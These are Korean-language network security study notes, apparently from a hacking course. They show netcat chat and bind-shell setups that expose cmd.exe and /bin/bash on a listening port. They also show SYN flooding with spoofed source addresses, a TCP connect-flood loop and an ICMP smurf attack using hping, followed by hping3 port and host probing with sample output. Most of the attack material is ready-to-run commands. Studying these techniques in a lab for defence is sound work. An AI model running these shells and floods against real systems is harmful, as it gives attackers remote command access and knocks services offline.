Network Attack
NC
! NC로 연결후 채팅하기 사용하기
! 서버 설정
# nc -l -p 3000
c:\> nc -lvp 3000
! 클라이언트 설정
# nc <Server_ip> 3000
! 연결한 후 Message를 입력하면 연결된 두 사용자간 Message가 전달된다.
==============================================
Linux에서 --> Windows로 접속
Windows용 NC를 받아 C:\ 압출 풀어 놓는다..
c:\> nc -l -p 30000 -e cmd.exe
! 공격자 측에서...
nc <서버IP> 30000
Windows에서 --> Linux로 접속
! Linux에서 설정
# nc -l -p 30000 -e /bin/bash
! Windows에서 설정
C:\>nc <서버IP> 30000
==============================================
*****************
Syn flooding Attack
*****************
; 현재 거의 모든 시스템은 방어 설정이 되어 있음....
! victim 설정 (공격당하는 포트 상태 모니터링 위한 설정)
# while [ 1 ]
>do
>netstat -ant
>sleep 1
>done
! Attacker 설정 ( HTTPD를 실행한 후)
# hping -a 1.1.1.1 victim_ip -p 80 -S -i u10000
-a <위장할 IP>
-p <목적지 포트>
-S : syn flag 설정
-i interval : 생성간격 설정 (Example : -i u1000 은 1000은 1초당 1번)
u1000 : 초당 1개, u10000 은 초당 10개의 packet 생성
자세한 도움말은....
"hping --help" 명령을 이용한다...
********************************
tcp connect flooding (자원 고갈 공격)
********************************
! 공격자 설정
# while [ 1 ]
> do
> nc <victim_ip> <port> &
> done
! 희생자 설정 Linux 에서... netstat -ant 를 sleep 1 (1초 마다 반복)
# while [ 1 ]
> do
> netstat -ant
> sleep 1
> done
*********************
ICMP Smurf Attack
*********************
# hping -1 10.10.10.255 -a <victim-ip> -i u10000
example>
hping -1 10.10.10.255 -a 10.10.10.33 -i u10000
! 공격 당하는 컴퓨터는 Ethereal 을 실행 한 후 모니터링을 한다.
자신이 요청하지 않은 많은 icmp응답 패킷이 들어오는 것을 확인한다......
HPING
[HPING] hping을 이용한 호스트 및 포트 탐지 방법
HPING3 - Host and Port 탐지
=======================================
Tool: HPING: http://www.hping.org/download.html
=======================================
PART I
TCP SYN Packet 탐지 :
=================================================
목적지에 TCP SYN flag를 설정하여 전송하며, Port가 열려 있는 경우 SYN/ACL flag Packet으로 응답이 올것이고, 닫혀있는 Port인 경우 RST/ACK flag Packet으로 응답하게 된다.
[root@hcne]#hping3 192.168.50.254 -S -c 1 -p 80
Switches defined :
-S = Set the SYN flag.
-c 1 = Packet count. In this example, I only sent one.
- p 21 = The port on the remote host I want to send the packet to.
bt ~ # hping3 192.168.50.254 -S -c 1 -p 80
HPING 192.168.50.254 (eth0 192.168.50.254): S set, 40 headers + 0 data bytes
len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=1.2 ms
--- 192.168.50.254 hping statistic ---
1 packets tramitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 1.2/1.2/1.2 ms
NOTE : 응답 패킷은 len=46으로 시작하는 필드이다.
위 패킷 전송으로 192.168.50.254번 포트에 80번 포트가 열려 있는 것을 확인할 수 있다.
TCP 연결은 3-way handshake을 요구하기 때문에 SYN/ACK를 보내왔다.
응답 패킷 필드에 내용은 다음과 같다.
S set – The SYN flag is set.
40 headers + 0 data bytes – Data는 0 byte이고 IP Header(20byte) + TCP Header(20byte)를 나타낸다.
len - byte단위에 사이즈를 나타낸다. Data Link Header Size가 포함된 크기이다.
ip – 목적지 IP Address를 나타낸다.
ttl – Packet에 Default Time-to-live 설정값이다.
DF - "don't fragment" bit 설정
id = IP identification정보
sport = Source Port이다. 응답해오는 포트이므로 전송시 목적지로 명시한 포트이다.
flags = 응답 패킷에 flag 설정 값
seq = TCP Header에 Sequence number (32bit)
win = TCP window size.
rtt = round trip time in milliseconds.
만약 닫혀있는 포트에 SYN 패킷을 전송하면 RTS/ACK 패킷을 받게 된다.
[root@bt]#hping3 10.10.10.10 -S –c 1 -p 8
bt ~ # hping3 192.168.50.254 -S -c 1 -p 8
HPING 192.168.50.254 (eth0 192.168.50.254): S set, 40 headers + 0 data bytes
len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=RA seq=0 win=0 rtt=1.2 ms
--- 192.168.50.254 hping statistic ---
1 packets tramitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 1.2/1.2/1.2 ms
Port 8로 TCP SYN 패킷을 보내보니 RST/ACK flag가 설정된 응답패킷을 받았다. 이 포트는 닫혀있을을 의미한다.
TCP ACK packet : Host에 alive를 검사한다.
=================================================
Host에 ACK(acknowledge) bit flag를 설정하여 패킷을 전송하면, 호스트가 존재하는 경우 포트에 Open/Close 상태에 상관없이 RTS flag를 설정하여 전송한다.
[root@hcne]#hping3 192.168.50.254 -A –c 1 -p 8
Switches defined :
-A = ACK flag 설정
-c 1 = Packet count 1개
- p 123 = Packet을 전송할 목적지 포트 123지정
bt ~ # hping3 192.168.50.254 -A -c 1 -p 8
HPING 192.168.50.254 (eth0 192.168.50.254): A set, 40 headers + 0 data bytes
len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=R seq=0 win=0 rtt=1.2 ms
만약 존재하지 않는 IP Address에 Packet을 전송한 경우 다음과 같은 내용을 볼 수 있다.
bt ~ # hping3 192.168.50.252 -A -c 1 -p 8
HPING 192.168.50.252 (eth0 192.168.50.252): A set, 40 headers + 0 data bytes
--- 192.168.50.252 hping statistic ---
1 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
TCP SYN/ACK packet : 호스트 활성상태 검사하는 다른 방법
==================================================
TCP SYN/ACK Flag를 설정하여 전송하여도 ACK flag를 설정하여 전송하는 경우와 동일한 결과를 볼 수 있다.
[root@bt]#hping3 10.10.10.10 -SA –c 1 -p 8
bt ~ # hping3 192.168.50.254 -SA -c 1 -p 8
HPING 192.168.50.254 (eth0 192.168.50.254): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.50.254 ttl=64 DF id=0 sport=8 flags=R seq=0 win=0 rtt=8.3 ms
Microsoft Office OneNote 2007을 사용하여 작성했습니다.
모든 노트 및 정보를 한 곳에서 볼 수 있습니다.